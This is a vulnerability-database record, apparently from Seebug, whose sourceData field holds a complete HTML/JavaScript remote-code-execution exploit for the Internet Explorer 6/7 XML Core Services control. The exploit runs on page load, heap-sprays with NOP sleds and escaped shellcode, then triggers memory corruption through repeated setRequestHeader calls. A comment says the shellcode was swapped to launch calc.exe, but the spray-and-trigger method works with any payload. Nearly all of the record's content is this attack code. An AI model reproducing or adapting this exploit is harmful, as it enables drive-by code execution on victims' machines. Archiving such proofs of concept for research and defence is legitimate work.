{"id": "SSV:5500", "type": "seebug", "bulletinFamily": "exploit", "title": "MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit", "description": "No description provided by source.", "published": "2006-11-09T00:00:00", "modified": "2006-11-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-5500", "reporter": "Root", "references": [], "cvelist": [], "lastseen": "2017-11-19T22:21:36", "history": [], "viewCount": 0, "enchantments": {"vulnersScore": 6.8}, "enchantments_done": [], "objectVersion": "1.4", "sourceHref": "https://www.seebug.org/vuldb/ssvid-5500", "sourceData": "\n <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">\r\n<!--\r\nMS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit\r\n\r\nAuthor: n/a\r\n\r\nInfo:\r\nhttp://blogs.securiteam.com/index.php/archives/721\r\nhttp://isc.sans.org/diary.php?storyid=1823\r\nhttp://xforce.iss.net/xforce/alerts/id/239\r\n\r\nFound in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)\r\n\r\nChanged up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.\r\n\r\n/str0ke\r\n-->\r\n\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<body>\r\n<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >\r\n</object>\r\n<script>\r\nvar obj = null;\r\nfunction exploit() {\r\nobj = document.getElementById('target').object;\r\n\r\ntry {\r\nobj.open(new Array(),new Array(),new Array(),new Array(),new Array());\r\n} catch(e) {};\r\n\r\nsh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +\r\n\t"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +\r\n\t"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +\r\n\t"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +\r\n\t"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +\r\n\t"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +\r\n\t"%uFF57%u63E7%u6C61%u0063");\r\n\r\nsz = sh.length * 2;\r\nnpsz = 0x400000-(sz+0x38);\r\nnps = unescape ("%u0D0D%u0D0D");\r\nwhile (nps.length*2<npsz) nps+=nps;\r\nihbc = (0x12000000-0x400000)/0x400000;\r\nmm = new Array();\r\nfor (i=0;i<ihbc;i++) mm[i] = nps+sh;\r\n\r\nobj.open(new Object(),new Object(),new Object(),new Object(), new Object()); \r\n\r\nobj.setRequestHeader(new Object(),'......');\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\nobj.setRequestHeader(new Object(),0x12345678);\r\n}\r\n</script>\r\n<body onLoad='exploit()' value='Exploit'>\r\n\r\n</body></html>\r\n\r\n\n ", "status": "poc", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}

{"result": {}}